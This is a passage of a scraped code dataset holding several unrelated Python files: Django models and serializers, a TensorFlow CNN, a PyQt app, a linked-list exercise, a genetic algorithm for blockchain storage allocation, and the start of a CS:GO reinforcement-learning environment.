\"\"\"Base mixin, Provide `mypy` stubs for common methods and properties\"\"\"\n _g: typing.Optional[GraphLike]\n get_ns: typing.Callable\n add_ns: 
typing.Callable\n _ns: typing.Dict\n add: typing.Callable\n base_uri: typing.Optional[str]\n parse: typing.Callable\n get_context: typing.Callable\n use_gpus: bool\n serialize: typing.Callable\n build_blank_graph: typing.Callable\n graph_factory: typing.Callable\n remove: typing.Callable\n","repo_name":"DerwenAI/kglab","sub_path":"kglab/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":520,"dataset":"github-code","pt":"52"} +{"seq_id":"71996356004","text":"# csv2json.py\n# 2023-06-01 K.OHWADA\n\nimport csv\nimport json\n\ndic = {}\n\ndic['title'] = \"List of Member states of the United Nations with National Flag\"\n\ndic['desc'] =\"The member states of the United Nationscomprise 193 sovereign states. The United Nations (UN) is the world's largest intergovernmental organization. All members have equal representation in the UN General Assembly.\"\n\ndic['reference'] = \"wikipedia: Member states of the United Nations\"\n\ndic['url_reference'] =\"https://en.wikipedia.org/wiki/Member_states_of_the_United_Nations\"\n\ncountries=[]\n\nwith open('un_members_flag.csv') as f1:\n reader = csv.reader(f1)\n for row in reader:\n d= {}\n d['country'] = row[0].strip()\n d['offical_name'] = row[1].strip()\n d['url_country'] = row[2].strip()\n d['url_flag_icon'] = row[3].strip()\n d['icon_width'] = int( row[4].strip() )\n d['icon_height'] = int( row[5].strip() )\n d['url_flag'] = row[6].strip()\n d['flag_width'] = int( row[7].strip() )\n d['flag_height'] = int( row[8].strip() )\n\n print(d)\n countries.append(d)\n\ndic['countries'] = countries\n\nwith open('un_members_flag.json', 'wt') as f2:\n json.dump(dic, f2)\n","repo_name":"ohwada/World_Countries","sub_path":"un_member_states_flag/python/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10444768348","text":"from django.db import models\n\nfrom apps.participants.models import InuitsParticipant\nfrom apps.participants.models.enums import ParticipantType, PaymentStatus\nfrom apps.participants.managers import VisumParticipantManager\n\nfrom scouts_auth.inuits.models import AuditedBaseModel\nfrom scouts_auth.inuits.models.fields import DefaultCharField\n\n\nclass VisumParticipant(AuditedBaseModel):\n objects = VisumParticipantManager()\n\n participant = models.ForeignKey(\n InuitsParticipant, on_delete=models.CASCADE, related_name=\"visum_participant\"\n )\n participant_type = DefaultCharField(\n choices=ParticipantType.choices,\n default=ParticipantType.PARTICIPANT,\n max_length=1,\n )\n payment_status = DefaultCharField(\n choices=PaymentStatus.choices, default=PaymentStatus.NOT_PAYED, max_length=1\n )\n\n class Meta:\n ordering = [\n \"participant__first_name\",\n \"participant__last_name\",\n \"participant__birth_date\",\n \"participant__group_group_admin_id\",\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def equals_visum_participant(self, updated_visum_participant):\n if updated_visum_participant is None:\n return False\n\n if (\n not type(updated_visum_participant).__class__.__name__\n == self.__class__.__name__\n ):\n return False\n\n return (\n self.equals_participant(updated_visum_participant.participant)\n and self.participant_type == updated_visum_participant.participant_type\n and self.payment_status == updated_visum_participant.payment_status\n )\n\n def __str__(self):\n return \"id 
({}), participant_type ({}), payment_status ({}), participant({})\".format(\n            self.id, self.participant_type, self.payment_status, str(self.participant)\n        )\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/participants/models/visum_participant.py","file_name":"visum_participant.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"39171057673","text":"import math\n\n# NOTE: this module assumes the TensorFlow 1.x API (tf.truncated_normal, keep-prob dropout);\n# NUM_CLASSES is expected to be defined by the importing module.\nimport tensorflow as tf\n\n\ndef conv2d(x, W):\n    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n                          strides=[1, 2, 2, 1], padding='SAME')\n\ndef weight_variable(shape, unit):\n    initial = tf.truncated_normal(shape,\n                                  stddev=math.sqrt(2.0 / float(unit)))\n    return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n    initial = tf.constant(0.1, shape=shape)\n    return tf.Variable(initial)\n\n\ndef inference(images, keep):\n\n    input1 = tf.reshape(images, [-1, 64, 64, 1])\n\n    filter1 = weight_variable([3, 3, 1, 64], 3 * 3 * 1)\n    bias1 = bias_variable([64])\n\n    h_conv1 = tf.nn.relu(conv2d(input1, filter1) + bias1)\n    input2 = max_pool_2x2(h_conv1)\n\n    filter2 = weight_variable([3, 3, 64, 128], 3 * 3 * 64)\n    bias2 = bias_variable([128])\n\n    h_conv2 = tf.nn.relu(conv2d(input2, filter2) + bias2)\n    input3 = max_pool_2x2(h_conv2)\n\n    filter3 = weight_variable([3, 3, 128, 256], 3 * 3 * 128)\n    bias3 = bias_variable([256])\n\n    h_conv3 = tf.nn.relu(conv2d(input3, filter3) + bias3)\n\n    filter4 = weight_variable([3, 3, 256, 128], 3 * 3 * 256)\n    bias4 = bias_variable([128])\n\n    h_conv4 = tf.nn.relu(conv2d(h_conv3, filter4) + bias4)\n    input5 = max_pool_2x2(h_conv4)\n\n    input5_flat = tf.reshape(input5, [-1, 8 * 8 * 128])\n\n\n    # Linear\n    with tf.name_scope('full_connect1'):\n        weights = tf.Variable(\n            tf.truncated_normal([8 * 8 * 128, 1024],\n                                stddev=1.0 / math.sqrt(float(8 * 8 * 128))),\n            name='weights')\n        biases = tf.Variable(tf.zeros([1024]),\n                             name='biases')\n        tinput6 = tf.matmul(input5_flat, weights) + biases\n        input6 = tf.nn.dropout(tinput6, keep)\n\n    with tf.name_scope('full_connect2'):\n        weights = tf.Variable(\n            tf.truncated_normal([1024, 512],\n                                stddev=1.0 / math.sqrt(float(1024))),\n            name='weights')\n        biases = tf.Variable(tf.zeros([512]),\n                             name='biases')\n        tinput7 = tf.matmul(input6, weights) + biases\n        input7 = tf.nn.dropout(tinput7, keep)\n\n    with tf.name_scope('softmax_linear'):\n        weights = tf.Variable(\n            tf.truncated_normal([512, NUM_CLASSES],\n                                stddev=1.0 / math.sqrt(float(512))),\n            name='weights')\n        biases = tf.Variable(tf.zeros([NUM_CLASSES]),\n                             name='biases')\n        logits = tf.matmul(input7, weights) + biases\n\n    return logits\n","repo_name":"botianzhe/fingerprint_liveness_detection","sub_path":"split/networkStructure.py","file_name":"networkStructure.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"3751601715","text":"from fbs_runtime.application_context.PyQt5 import ApplicationContext\n\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom api import Api\n\nfrom dashboard import Dashboard\nfrom resources import Resources\nfrom jobs import Jobs\nfrom settings import Settings\n\nfrom interfaces.app import AppUI\nfrom interfaces.widgets import Notification, CreditHistory\n\n\nclass App(AppUI):\n    def __init__(\n        self, logout_signal: pyqtSignal, cxt: ApplicationContext, *args, **kwargs\n    ):\n        super(App, self).__init__(cxt, *args, **kwargs)\n\n        self.cxt = cxt\n\n
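        # cached account info; populated by update_account() below\n        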
self.username = \"\"\n self.total_balance = 0\n\n self.logout_signal = logout_signal\n\n self.update_account()\n self.on_dashboard_clicked()\n\n def update_account(self):\n # fetch account information\n self._api_get_call()\n\n # update navigation credit value\n self.navigation.set_credit(self.total_balance)\n\n # update account username and credit value\n self.account.update_info(self.username, self.total_balance)\n\n def on_dashboard_clicked(self):\n self.sidebar.on_dashboard_clicked()\n self._sidebar_widget_updated(Dashboard)\n\n def on_resources_clicked(self):\n self.sidebar.on_resources_clicked()\n self._sidebar_widget_updated(Resources)\n\n def on_jobs_clicked(self):\n self.sidebar.on_jobs_clicked()\n self._sidebar_widget_updated(Jobs)\n\n def on_settings_clicked(self):\n self.sidebar.on_settings_clicked()\n self._sidebar_widget_updated(Settings)\n\n def on_notification_clicked(self):\n popup = Notification(self.cxt)\n popup.exec_()\n\n # credit history popup\n def on_credit_history_clicked(self):\n popup = CreditHistory(self.cxt)\n popup.exec_()\n\n # def on_about_clicked(self):\n # pass\n\n def on_logout_clicked(self):\n\n with Api(self.cxt, \"/auth/logout\") as account_api:\n status, res = account_api.post()\n\n if status == 200:\n self.close()\n self.logout_signal.emit()\n\n def _sidebar_widget_updated(self, widget=None):\n \"\"\"\n This is a helper function that is called *manually* by the `clicked` callback function\n attached to each of the sidebar widgets.\n\n Its purpose is to reset each sidebar widgets style to default and manage the\n widget stack\n\n :param widget: The clicked on widget that we want to instantiate\n :return: None\n \"\"\"\n\n # Deallocate current widget if it exists\n if self.main_window.stack.count():\n self.main_window.stack.currentWidget().setParent(None)\n\n if widget is not None:\n self.main_window.stack_widget = widget(self.cxt)\n self.main_window.stack.addWidget(self.main_window.stack_widget)\n else:\n # Default to dashboard I guess?\n self.main_window.stack_widget = Dashboard(self.cxt)\n self.main_window.stack.addWidget(self.main_window.stack_widget)\n\n # notification popup\n\n def _api_get_call(self):\n\n # fetch account information\n with Api(self.cxt, \"/account\") as account:\n status, res = account.get()\n\n if not res or status != 200:\n self.username = \".\"\n self.total_balance = 0\n else:\n # Insert comma here so we can default to nameless greeting if api fails.\n self.username = res[\"account\"][\"firstname\"].capitalize()\n self.total_balance = round(res[\"account\"][\"credits\"], 4)\n","repo_name":"deepmarket/PLUTO","sub_path":"src/main/python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31510994850","text":"from django.db import transaction\nfrom djoser.serializers import UserCreateSerializer, UserSerializer\nfrom drf_extra_fields.fields import Base64ImageField\nfrom rest_framework import serializers, status\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import SerializerMethodField\n\nfrom recipes.models import (Favorite, Ingredient, IngredientRecipe, Recipe,\n ShoppingCart, Tag)\nfrom users.models import Follow, User\n\n\nclass UserCommonFieldsSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для общих полей пользователя.\"\"\"\n is_subscribed = serializers.BooleanField(default=False)\n\n class Meta:\n model = User\n fields = (\n 'email',\n 'id',\n 
'username',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n )\n\n\nclass CustomUserSerializer(UserCommonFieldsSerializer):\n \"\"\"Сериализатор пользователя.\"\"\"\n class Meta(UserCommonFieldsSerializer.Meta):\n pass\n\n\nclass CreateUserSerializer(UserCreateSerializer):\n \"\"\"Сериализатор создания пользователя.\"\"\"\n class Meta:\n model = User\n fields = ('email', 'username', 'first_name', 'last_name', 'password',)\n\n\nclass ShowSubscriptionsSerializer(UserSerializer):\n \"\"\"Сериализатор для отображения подписок.\"\"\"\n recipes = SerializerMethodField()\n recipes_count = SerializerMethodField()\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'email',\n 'id',\n 'username',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n 'recipes',\n 'recipes_count',\n )\n read_only_fields = ('email', 'username', 'first_name', 'last_name',)\n\n def get_is_subscribed(self, obj):\n request = self.context.get('request')\n user = request.user if request else None\n return (user is not None and user.is_authenticated) or False\n\n def validate(self, data):\n author = self.instance\n user = self.context.get('request').user\n if Follow.objects.filter(author=author, user=user).exists():\n raise ValidationError(\n detail='Подписка уже существует.',\n code=status.HTTP_400_BAD_REQUEST,\n )\n if user == author:\n raise ValidationError(\n detail='Невозможно осуществить подписку на самого себя.',\n code=status.HTTP_400_BAD_REQUEST,\n )\n return data\n\n def get_recipes_count(self, obj):\n return obj.recipes.count()\n\n def get_recipes(self, obj):\n request = self.context.get('request')\n recipes_limit = request.GET.get('recipes_limit')\n recipes = obj.recipes.all()\n if recipes_limit:\n recipes = recipes[:int(recipes_limit)]\n serializer = DemoRecipeSerializer(recipes, many=True, read_only=True)\n return serializer.data\n\n\nclass TagSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор тегов.\"\"\"\n\n class Meta:\n model = Tag\n fields = ('id', 'name', 'color', 'slug',)\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор ингредиентов.\"\"\"\n\n class Meta:\n model = Ingredient\n fields = ('id', 'name', 'measurement_unit',)\n\n\nclass IngredientRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для отображения связи ингредиентов и рецепта.\"\"\"\n id = serializers.PrimaryKeyRelatedField(\n queryset=Ingredient.objects.all()\n )\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit'\n )\n\n class Meta:\n model = IngredientRecipe\n fields = ('id', 'name', 'measurement_unit', 'amount',)\n\n\nclass ShowRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для чтения рецептов.\"\"\"\n tags = TagSerializer(read_only=False, many=True)\n author = UserSerializer(read_only=True, many=False)\n ingredients = IngredientRecipeSerializer(\n many=True,\n source='ingredient_amount'\n )\n is_favorited = serializers.BooleanField(default=False)\n is_in_shopping_cart = serializers.BooleanField(default=False)\n image = Base64ImageField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n\nclass CreateRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для создания рецептов.\"\"\"\n ingredients = IngredientRecipeSerializer(many=True)\n tags = 
serializers.PrimaryKeyRelatedField(\n many=True,\n queryset=Tag.objects.all()\n )\n image = Base64ImageField()\n author = UserSerializer(read_only=True)\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n @staticmethod\n def create_ingredients(recipe, ingredients):\n ingredient_list = []\n for ingredient_data in ingredients:\n ingredient_list.append(\n IngredientRecipe(\n ingredient=ingredient_data.pop('id'),\n amount=ingredient_data.pop('amount'),\n recipe=recipe,\n )\n )\n IngredientRecipe.objects.bulk_create(ingredient_list)\n\n @transaction.atomic\n def create(self, validated_data):\n request = self.context.get('request', None)\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n recipe = Recipe.objects.create(author=request.user, **validated_data)\n recipe.tags.set(tags)\n self.create_ingredients(recipe, ingredients)\n return recipe\n\n @transaction.atomic\n def update(self, instance, validated_data):\n instance.tags.clear()\n IngredientRecipe.objects.filter(recipe=instance).delete()\n instance.tags.set(validated_data.pop('tags'))\n ingredients = validated_data.pop('ingredients')\n self.create_ingredients(instance, ingredients)\n return super().update(instance, validated_data)\n\n def to_representation(self, instance):\n \"\"\"Метод для представления результата сериализатора.\"\"\"\n return ShowRecipeSerializer(\n instance,\n context={'request': self.context.get('request')}\n ).data\n\n\nclass DemoRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для упрощенного отображения модели рецепта.\"\"\"\n class Meta:\n model = Recipe\n fields = ('id', 'name', 'image', 'cooking_time',)\n\n\nclass FavoritesCartBasicSerializer(serializers.ModelSerializer):\n \"\"\"Базовый сериализатор для избранного и корзины.\"\"\"\n def to_representation(self, instance):\n \"\"\"Метод представления результата сериализатора.\"\"\"\n return DemoRecipeSerializer(\n instance.recipe,\n context={'request': self.context.get('request')}\n ).data\n\n def validate(self, data):\n \"\"\"Метод для валидации, если объект уже существует.\"\"\"\n request = self.context.get('request')\n if not request or request.user.is_anonymous:\n return False\n recipe = data['recipe']\n if self.model.objects.filter(\n user=request.user,\n recipe=recipe\n ).exists():\n raise serializers.ValidationError({'status': 'Уже существует!'})\n return data\n\n\nclass FavoriteSerializer(FavoritesCartBasicSerializer):\n \"\"\"Сериализатор для избранных рецептов.\"\"\"\n model = Favorite\n\n class Meta:\n model = Favorite\n fields = ('user', 'recipe',)\n\n\nclass ShoppingCartSerializer(FavoritesCartBasicSerializer):\n \"\"\"Сериализатор для корзины покупок.\"\"\"\n model = ShoppingCart\n\n class Meta:\n model = ShoppingCart\n fields = ('user', 'recipe',)\n","repo_name":"meveladron/foodgram-project-react","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73521767204","text":"\"\"\"\nProszę napisać funkcję wstawiającą na koniec listy nowy element. Do\nfunkcji należy przekazać wskazanie na pierwszy element listy oraz wstawianą\nwartość.\n\nProszę napisać funkcję usuwającą ostatni element listy. 
Do funkcji\nnależy przekazać wskazanie na pierwszy element listy.\n\n"""\n\nclass Node:\n    def __init__(self, val):\n        self.val = val\n        self.next = None\n\ndef wstaw(first, value):\n    p = first\n    r = Node(value)\n    if p == None:\n        return r\n\n    while p != None:\n        prev = p\n        p = p.next\n\n    prev.next = r\n    return first\n\ndef usun(first):\n    p = first\n    # check p before touching p.next so an empty list is handled safely\n    if p == None or p.next == None:\n        return None\n    while p.next != None:\n        prev = p\n        p = p.next\n    prev.next = None\n    return first\n\n\ndef wypisz(first):\n    while first is not None:\n        #print(first)\n        print(first.val, '--->', end='')\n        first = first.next\n    print()\n\n\nlista = Node(46)\nlista = wstaw(lista, 23)\nlista = wstaw(lista, 3561)\nlista = wstaw(lista,2)\nwypisz(lista)\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/zestaw_7/cw6 i cw7.py","file_name":"cw6 i cw7.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"2888910562","text":"# -*- coding: utf-8 -*-\r\n"""\r\nCreated on Fri Dec 2 10:51:59 2022\r\nQ2_opt2\r\n@author: Lethe\r\n"""\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\nnp.random.seed(1037)\r\nrandom.seed(1225)\r\n\r\n'''\r\n随机生成区块分配方案 同时判断生成的方案是否满足基本要求\r\nnodeNum blockNum 为全局变量\r\n完全随机找到合适的值比较慢 可优化\r\n'''\r\ndef generate_blockAllo(alloNum=10): #默认生成100种分配\r\n    blockAlloGen = np.zeros((alloNum,nodeNum,blockNum)).astype(bool)\r\n    for i in range(alloNum):\r\n        blockAllo = np.random.randint(2, size=(nodeNum,blockNum)).astype(bool)\r\n        while(np.all(constraint(blockAllo))==False):\r\n            blockAllo = np.random.randint(2, size=(nodeNum,blockNum)).astype(bool)\r\n        blockAlloGen[i,:,:] = blockAllo\r\n\r\n    return blockAlloGen\r\n\r\n'''随机生成区块 按照备份数量生成'''\r\ndef generate_blockAllo_backups(alloNum=10):\r\n    blockAlloGen = np.zeros((alloNum,nodeNum,blockNum)).astype(bool)\r\n    for i in range(alloNum):\r\n        blockAllo = np.zeros((nodeNum,blockNum)).astype(bool)\r\n        while(np.all(constraint(blockAllo))==False):\r\n            blockAllo = np.zeros((nodeNum,blockNum)).astype(bool)\r\n            for block in range(blockNum):\r\n                nodeChoice = random.sample(range(nodeNum), blockBackups)\r\n                for index in nodeChoice:\r\n                    blockAllo[index,block] = True\r\n        blockAlloGen[i,:,:] = blockAllo\r\n    \r\n    return blockAlloGen\r\n\r\n'''\r\n约束条件判断\r\n输入 区块分配方案 blockAllo\r\n输出 True False\r\n其中 blockInfo blockBackups nodeInfo storageLimit 为全局变量,条件可选\r\n'''\r\ndef constraint(blockAllo, condition = -1): #-1代表所有条件,0-2代表条件1-3\r\n    if(condition == -1):\r\n        constraint_result = np.full(3, False, dtype=bool) #三个约束的结果 默认全False\r\n        #约束条件1 每个节点的空间限制\r\n        constraint_result[0] = np.all(np.dot(blockAllo,blockInfo[:,1]) <= nodeInfo[:,1]) #为True即为节点均满足要求\r\n        #约束条件2 每个区块至少有blockBackups备份\r\n        constraint_result[1] = np.all(blockAllo.sum(axis=0) >= blockBackups) #为True即为满足备份数量要求\r\n        #约束条件3 系统总的存储空间占用率不超过限定值\r\n        constraint_result[2] = (np.sum(blockAllo.sum(axis=0)*blockInfo[:,1])/np.sum(nodeInfo[:,1])<=storageLimit) #为True即为满足约束\r\n        return constraint_result\r\n    \r\n    elif(condition == 0):\r\n        return np.all(np.dot(blockAllo,blockInfo[:,1]) <= nodeInfo[:,1])\r\n    \r\n    elif(condition == 1):\r\n        return np.all(blockAllo.sum(axis=0) >= blockBackups)\r\n    \r\n    elif(condition == 2):\r\n        return np.sum(blockAllo.sum(axis=0)*blockInfo[:,1])/np.sum(nodeInfo[:,1])<=storageLimit\r\n    \r\n\r\n'''\r\n计算目标函数\r\n全局变量 costAll\r\n'''\r\ndef objective(blockAllo):\r\n    nodeBlockCost = np.zeros((nodeNum,blockNum)) #节点访问区块的代价,行代表节点,列代表区块\r\n    for node in range(nodeNum):\r\n        for block 
in range(blockNum):\r\n nodeBlockCost[node,block] = np.min(costAll[block,blockAllo[:,block]==1,node]) #选出通信成本最小的节点所需成本\r\n nodeProportion = np.dot(blockAllo,blockInfo[:,1])/nodeInfo[:,1] #节点存储空间占总空间的比例\r\n nodeProportion = (np.exp(5*nodeProportion)-1)/(np.exp(5)-1)*10 #按照指定函数对空间占用率进行处理\r\n \r\n #分别为 通信成本 存储平衡度 总目标\r\n #计算总目标时乘以 1/区块数量\r\n result = np.array([np.sum(nodeBlockCost),np.sum(nodeProportion),(np.sum(nodeBlockCost)+np.sum(nodeProportion))/nodeNum])\r\n return result\r\n\r\n'''计算个体的适应度'''\r\ndef cal_fitness(blockAlloGen):\r\n alloNum = blockAlloGen.shape[0]\r\n #行代表一种分配/个体 列依次为 适应度 通信成本 存储平衡度 总目标\r\n alloFit = np.zeros((alloNum,4)) \r\n for index,blockAllo in enumerate(blockAlloGen): #遍历\r\n alloFit[index,1:] = objective(blockAllo)\r\n \r\n alloFit[:,0] = -(alloFit[:,3]-np.max(alloFit[:,3]))+1e-3 #计算适应度 适应度为正数\r\n return alloFit\r\n\r\n'''选择一定数量的个体'''\r\ndef select(blockAlloGen, alloFit, selectSize=1):\r\n idx = np.random.choice(np.arange(alloFit.shape[0]), size=selectSize, replace=False, #replace代表是否能重复抽取\r\n p=(alloFit[:,0])/(alloFit[:,0].sum()) )\r\n return blockAlloGen[idx,:,:],alloFit[idx,:]\r\n\r\n'''交叉变异'''\r\ndef crossover_mutation(blockAlloGen, CROSSOVER_RATE=0.8, MUTATION_RATE=0.5):\r\n blockAlloNew = []\r\n alloSize = blockAlloGen.shape[0]\r\n crossover_flag, mutation_flag = 0,0\r\n for alloFa in blockAlloGen:\t\t#遍历种群中的每一个个体,将该个体作为父亲\r\n blockAlloNew.append(alloFa)\r\n alloChild = alloFa.copy()\t\t#孩子先得到父亲的全部基因\r\n #交叉\r\n if np.random.rand() < CROSSOVER_RATE:\t\t\t#以一定的概率发生交叉\r\n crossover_flag = 1\r\n alloMa = blockAlloGen[np.random.randint(alloSize),:,:]\t#再种群中选择另一个个体,并将该个体作为母亲\r\n crossPoints = np.random.randint(low=0, high=blockNum, size=nodeNum)\t#随机产生交叉的点\r\n for i in range(nodeNum): #按照行交叉\r\n alloChild[i,crossPoints[i]:] = alloMa[i,crossPoints[i]:] #孩子得到位于交叉点后的母亲的基因 \r\n #变异\r\n if np.random.rand() < MUTATION_RATE: \t\t\t\t#以MUTATION_RATE的概率进行变异\r\n mutation_flag = 1\r\n mutate_block = np.random.randint(0, blockNum)\t#随机产生一个实数 代表要变异基因的位置/列\r\n mutate_node = np.random.randint(0, nodeNum)\t#随机产生一个实数 代表要变异基因的位置/行\r\n alloChild[mutate_node, mutate_block] = alloChild[mutate_node, mutate_block]^1 \t#将变异点的二进制为反转\r\n \r\n # if np.all(constraint(alloChild))==True:\r\n # print('产生子代')\r\n # blockAlloNew.append(alloChild) #若交叉后的个体不满足约束条件 则不进行交叉\r\n if(crossover_flag|mutation_flag):\r\n constraint_result = constraint(alloChild)\r\n #大多数是因为第1个条件不满足要求\r\n #print(constraint_result)\r\n if(constraint_result[1]==False):\r\n alloChild = fix_constraint1(alloChild)\r\n constraint_result = constraint(alloChild)\r\n if np.all(constraint_result):\r\n blockAlloNew.append(alloChild)\r\n \r\n crossover_flag, mutation_flag = 0,0\r\n\r\n return np.array(blockAlloNew)\r\n\r\n\r\n'''\r\n对交叉变异后不满足条件1的情况进行修复(0-2)\r\n'''\r\ndef fix_constraint1(blockAllo):\r\n \r\n num = blockAllo.sum(axis=0) #该分配每个区块的数量\r\n for index,block in enumerate(num):\r\n if block<blockBackups:\r\n idx = np.random.choice(np.where(blockAllo[:,index]==False)[0], size=blockBackups-block, replace=False) #replace代表是否能重复抽取\r\n for i in idx:\r\n blockAllo[i,index] = True \r\n \r\n return blockAllo\r\n\r\nif __name__==\"__main__\":\r\n '''区块信息 节点信息 约束要求'''\r\n blockBackups = 3 #区块备份数量 至少为1\r\n storageLimit = 0.8 #优化后系统总存储空间占比\r\n #区块信息\r\n blockInfo = np.loadtxt('E:/PythonProject/BlockchainStorage/data/blockInfo30.csv', delimiter=',')\r\n blockNum = blockInfo.shape[0] #区块数量\r\n #节点信息\r\n nodeInfo = np.loadtxt('E:/PythonProject/BlockchainStorage/data/nodeInfo10.csv', delimiter=',')\r\n nodeNum = nodeInfo.shape[0] #节点数量\r\n \r\n 
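# echo the problem setup (blocks, peers, backups, storage target) before running the GA\r\n    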
print('Start...')\r\n print('Allocate {0} blocks to {1} peers.\\nBlock backup is {2}.\\nStorage optimization target is {3}.'.format(blockNum,nodeNum,blockBackups,storageLimit))\r\n \r\n #所有节点需要的花销shape=(blockNum,nodeNum,nodeNum)\r\n costAll = (blockInfo[:,1]*blockInfo[:,2]).reshape((blockNum,1,1)) * nodeInfo[:,2:].reshape((1,nodeNum,nodeNum))\r\n \r\n '''遗传算法信息'''\r\n epochNum = 100 #迭代次数\r\n bestBlockAllo = np.zeros((nodeNum,blockNum)).astype(bool) #目前最优分配\r\n alloFitEpoch = np.zeros((epochNum+1,3)) #每轮训练的最优结果 通信成本 存储平衡度 总目标\r\n \r\n #原始种群\r\n alloNum = 50 #种群数量\r\n #blockAlloGen = generate_blockAllo(alloNum) #生成原始种群\r\n blockAlloGen = generate_blockAllo_backups(alloNum)\r\n alloFit = cal_fitness(blockAlloGen) #计算原始种群的 总目标 适应度\r\n alloFitEpoch[0,:] = alloFit[np.argmin(alloFit[:,3]),1:]\r\n print('原始种群最大值',alloFit[np.argmax(alloFit[:,3]),-1])\r\n \r\n #迭代\r\n for epoch in range(epochNum):\r\n print('Epoch',epoch)\r\n \r\n blockAlloGen = crossover_mutation(blockAlloGen, CROSSOVER_RATE=0.8) #交叉变异\r\n print('Population size',blockAlloGen.shape[0])\r\n alloFit = cal_fitness(blockAlloGen) #计算种群适应度\r\n blockAlloGen,alloFit = select(blockAlloGen, alloFit, selectSize=alloNum) #选择个体\r\n alloFitEpoch[epoch+1,:] = alloFit[np.argmin(alloFit[:,3]),1:] #这一轮的最优值\r\n print('Current best',alloFitEpoch[epoch+1,:])\r\n bestBlockAllo = blockAlloGen[np.argmin(alloFit[:,3]),:,:] #这一轮的最优分配\r\n \r\n #结果\r\n plt.plot(range(epochNum+1), alloFitEpoch[:,2],'.-')\r\n #print(bestBlockAllo)\r\n \r\n \r\n \r\n\r\n\r\n","repo_name":"nick887/block_chain_storage","sub_path":"Q2_GA_opt/Q2_GA_opt1.py","file_name":"Q2_GA_opt1.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41941098623","text":"import time\n\nfrom stable_baselines3 import A2C\nimport gym\nfrom gym import spaces\nfrom gsi.server import GSIServer\nimport pymem\nimport mouse\nimport numpy as np\n\nfrom telnet_client.csgo_telnet_client import CSGOTelnetClient\n\nY_ANG_ADDR_OFFSET = 0x4dc4aec\nX_ANG_ADDR_OFFSET = Y_ANG_ADDR_OFFSET+4\n\nclass CSGOEnvironment(gym.Env):\n \"\"\"Custom Environment that follows gym interface\"\"\"\n metadata = {'render.modes': ['human']}\n\n def __init__(self, timescale=4, render_mode: str = None):\n assert render_mode is None or render_mode in self.metadata[\"render.modes\"]\n # Define action and observation space\n self.action_space = spaces.Box(low=-1, high=1, shape=(2,))\n self.observation_space = spaces.Box(low=np.array([-180, -90]), high=np.array([180, 90]), shape=(2,))\n\n self.timescale = timescale\n\n self.server = GSIServer((\"127.0.0.1\", 3000), \"S8RL9Z6Y22TYQK45JB4V8PHRJJMD9DS9\")\n self.server.start_server()\n\n self.pm = pymem.Pymem(\"csgo.exe\")\n self.client = pymem.process.module_from_name(self.pm.process_handle, \"client.dll\").lpBaseOfDll\n \n self.telnet_client = CSGOTelnetClient()\n self.telnet_client.connect()\n\n self.telnet_client.run(\"exec bot\")\n self.telnet_client.run(f\"host_timescale {timescale}\")\n\n self.step_counter = 0\n\n\n def _get_obs(self):\n x_angle = np.float32(round(self.pm.read_float(self.client+X_ANG_ADDR_OFFSET), 2) - self.initial_state[0])\n y_angle = np.float32(round(self.pm.read_float(self.client+Y_ANG_ADDR_OFFSET), 2) - self.initial_state[1])\n return np.array([x_angle, y_angle])\n\n def reset(self):\n self.step_counter = 0\n mouse.release()\n time.sleep(1/self.timescale) # There is a cooldown for the kill command\n self.telnet_client.run(\"kill\")\n 
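        # brief pause so the kill/respawn completes before re-equipping\n        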
